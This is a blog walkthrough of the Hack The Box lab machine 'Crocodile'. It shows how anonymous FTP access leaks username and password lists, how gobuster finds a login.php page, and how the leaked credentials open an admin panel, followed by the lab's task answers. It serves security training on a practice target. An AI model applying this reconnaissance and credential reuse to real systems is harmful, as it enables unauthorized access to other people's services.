#8 Crocodile - Starting Point - Hack The Box || Complete Detailed Walkthrough

Crocodile is another starting point vulnerable machine that contains a misconfigured service that leaks information that might allow you to impersonate the digital identity of a victim.


Tackling an example sewed together from two other previous targets, we will be looking at an insecure access configuration on FTP and an administrative login for a website. Let us proceed to deconstruct this vector and analyze its components.


Enumeration

We will start by enumerating the target. Our first step is, as always, a thorough n map scan. By using the following two switches for the scan, we ensure that our n map script analyses the service being run on any port found in the open state and returns a mostly exact service version value in the output and that all of the default analysis scripts are run against the target, as we are not constrained on how intrusive we can be with our scan. Running the scan as mentioned, we can receive results as seen below, with snippets of directories the scan has even found for us!

  • -sC: performs a script scan using the default set of scripts. It is equivalent to --script=default . Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
  • -sV: Enables version detection, which will detect what versions are running on what port.

┌──(mrdev㉿mrdev)-[~]
└─$ nmap -sC -sV 10.129.57.249
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 15:42 IST
Nmap scan report for 10.129.57.249
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (conn-refused)

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
Nmap done: 1 IP address (1 host up) scanned in 62.29 seconds
┌──(mrdev㉿mrdev)-[~] 
└─$ 

We have two open ports, which are 21 and 80.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Port 21 is the port dedicated to FTP (File Transfer Protocol), meaning that its' primary use is to transfer files between hosts on the same network.

How a Hacker Attempts to Log in Using Credential Stuffing and Brute Force Attacks

This article delves into the techniques hackers use to attempt unauthorized login into systems using credential stuffing and brute force attacks. It provides insights into the methods employed by attackers and offers guidance on how organizations can defend against such threats.


Using the FTP Client tool

Users could connect to the FTP server anonymously if the server is configured to allow it, meaning that we could use it even if we had no valid credentials. If we look back at our Nmap scan result, the FTP server is indeed configured to allow anonymous login.

21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.21
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd

To connect to the remote FTP server, you need to specify the target's IP address (or hostname), as displayed on the Starting Point lab page. The prompt will then ask us for our login credentials, which is where we can fill in the anonymous username. In our case, the FTP server does not request a password, and inputting the anonymous username proves enough for us to receive the 230 code, and Login in successfully.

┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.249
Connected to 10.129.57.249.
220 (vsFTPd 3.0.3)
Name (10.129.57.249:mrdev): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

We will use ls and get to list the directories and manipulate the files stored on the FTP server. With the ls command, we can check the contents of our current directory on the remote host, where two interesting files catch our attention. They seem to be files left over from the configuration of another service on the host, most likely the HTTPd Web Server. Their names are descriptive, hinting towards a possible username list and associated passwords.

ftp> ls
229 Entering Extended Passive Mode (|||44157|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist
-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd
226 Directory send OK.
ftp>

Both files can easily be downloaded using the get command. The FTP service will report the download status completion back to you during this phase. It should not take long to have them both sitting snuggly on your attacking VM.

ftp> get allowed.userlist
local: allowed.userlist remote: allowed.userlist
229 Entering Extended Passive Mode (|||43675|) 
150 Opening BINARY mode data connection for allowed.userlist (33 bytes).
100% |****************************************|    33      138.31 KiB/s    00:00 ETA 226 Transfer complete.
33 bytes received in 00:00 (0.09 KiB/s)
ftp> get allowed.userlist.passwd
local: allowed.userlist.passwd remote: allowed.userlist.passwd
229 Entering Extended Passive Mode (|||44853|)
150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes).
100% |****************************************|    62       72.07 KiB/s    00:00 ETA 226 Transfer complete.
62 bytes received in 00:00 (0.26 KiB/s)  
ftp>

Termination of the FTP connection can be done by using the bye command. This will return the current terminal tab to its' previous state.

ftp> bye
221 Goodbye.
┌──(mrdev㉿mrdev)-[~] 
└─$

Immediately after exiting the FTP service shell, we can type in the ls command to check if our files are present in the directory we were last positioned in. In order to read their contents and discover usernames and passwords within, we can use the cat command, followed by the name of the file we want to open.

┌──(mrdev㉿mrdev)-[~] 
└─$ ls  
allowed.userlist         Desktop    Documents  Music     Public     Videos
allowed.userlist.passwd   dirbuster  Downloads  Pictures  Templates  wordlist

┌──(mrdev㉿mrdev)-[~]
└─$ cat allowed.userlist 
aron
pwnmeow
egotisticalsw
admin

┌──(mrdev㉿mrdev)-[~]
└─$ cat allowed.userlist.passwd
root
Supersecretpassword1
@BaASD&9032123sADS
rKXM59ESxesUFHAd 

Foothold

After the credentials have been obtained, the next step is to check if they are used on the FTP service for elevated access or the webserver running on port 80 discovered during the Nmap scan. Attempting to log in with any of the credentials on the FTP server returns error code 530 This FTP server is anonymous only. No luck here, so we can exit the FTP service shell.

┌──(mrdev㉿mrdev)-[~]
└─$ ftp 10.129.57.249
Connected to 10.129.57.249.
220 (vsFTPd 3.0.3)
Name (10.129.57.249:mrdev): aron
530 This FTP server is anonymous only.
ftp: Login failed
ftp>

However, we have one option left. During the Nmap scan, the service running on port 80 was reported as Apache httpd 2.4.41, an Apache HTTP server. Typing in the IP address of the target into our browser's URL search bar results in this webpage. It seems to be a storefront for a server hosting company.

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Smash - Bootstrap Business Template
|_http-server-header: Apache/2.4.41 (Ubuntu)

Reading about the target is helpful, but only at a surface level. In order to gain more insight into the technology they have used to create their website and possibly find any associated vulnerabilities, we can use a handy browser plug-in called Wappalyzer. 


Using Wappalyzer

This plug-in analyzes the web page's code and returns all the different technologies used to build it, such as the webserver type, JavaScript libraries, programming languages, and more. 

If you are a Chrome user (Click here). If you are a Firefox user (click here).

Once installed, you can access Wappalyzer by pressing on its icon at the top right of the browser window. Below are the results for our current target.

From the output of Wappalyzer, we can note some of the more interesting items, specifically the PHP programming language used to build the web page. However, nothing gives us a direct plan of attack for now. Meanwhile, navigating around the page using the tabs and buttons provided on it leads us nowhere. Referencing previous write-ups, there is mention of a different, more direct way of navigating any hidden or hardly accessible directories and pages, and that is through dir busting. 


Using Gobuster

Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest, most accurate results.

  • dir : Uses directory/file enumeration mode.
  • -u  : The target URL.
  • -w : Path to the wordlist.
  • -x  : File extension(s) to search for.

For the -x switch, we can specify PHP and HTML to filter out all the unnecessary clutter that does not interest us. 

PHP and HTML files will most commonly be pages. We might get lucky and find an administrative panel login page that could help us find leverage against the target in combination with the credentials we extracted from the FTP server.

┌──(mrdev㉿mrdev)-[~]  
└─$ sudo gobuster dir -u 10.129.57.249 -w dirbuster/directory-list-2.3-small.txt -x php,html
[sudo] password for mrdev:  
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) 
===============================================================
[+] Url:                     http://10.129.57.249
[+] Method:                  GET 
[+] Threads:                 10
[+] Wordlist:                dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php 
[+] Timeout:                 10s
===============================================================
2021/12/24 16:44:16 Starting gobuster in directory enumeration mode
=============================================================== 
/index.html           (Status: 200) [Size: 58565]
/login.php            (Status: 200) [Size: 1577]
/assets               (Status: 301) [Size: 315] [--> http://10.129.57.249/assets/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.57.249/css/] 
/js                   (Status: 301) [Size: 311] [--> http://10.129.57.249/js/]
/logout.php           (Status: 302) [Size: 0] [--> login.php] 
/config.php           (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.57.249/fonts/]
/dashboard            (Status: 301) [Size: 318] [--> http://10.129.57.249/dashboard/]
Progress: 41064 / 262995 (15.61%)                                                   ^C

[!] Keyboard interrupt detected, terminating. 
===============================================================
2021/12/24 17:05:00 Finished
===============================================================  
┌──(mrdev㉿mrdev)-[~]
└─$ 

One of the most interesting files gobuster retrieved is the /login.php page. Navigating manually to the URL, in the form of http://10.129.57.249/login.php, we are met with a login page asking for a username/password combination.


If the lists of credentials we found had been longer, we could have used a Metasploit module or a login brute-force script to run through combinations from both lists faster than manual labor. In this case, however, the lists are relatively small, allowing us to attempt logging in manually.

aron:root
pwnmeow:Supersecretpassword1
egotisticalsw:@BaASD&9032123sADS
admin:rKXM59ESxesUFHAd 
After attempting several username/password combinations, we managed to log in and are met with a Server Manager admin panel. Once here, an attacker could manipulate the website in whichever way they desired, causing havoc for the userbase and owners, or extracting more information that would assist them with gaining a foothold on the servers hosting the web page.


We successfully got the flag! It is displayed for us at the top of the admin panel. 

Task Answers


TASK 1: What nmap scanning switch employs the use of default scripts during a scan?

Ans. -sC

TASK 2: What service version is found to be running on port 21?

Ans. vsftpd 3.0.3

TASK 3: What FTP code is returned to us for the "Anonymous FTP login allowed" message?

Ans. 230

TASK 4: What command can we use to download the files we find on the FTP server?

Ans. get

TASK 5: What is one of the higher-privilege-sounding usernames in the list we retrieved?

Ans. admin

TASK 6: What version of Apache HTTP Server is running on the target host?

Ans. 2.4.41

TASK 7: What is the name of a handy website analysis plug-in we can install in our browser?

Ans. Wappalyzer

TASK 8: What switch can we use with gobuster to specify we are looking for specific file types?

Ans. -x

TASK 9: What file have we found that can provide us a foothold on the target?

Ans. login.php



Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!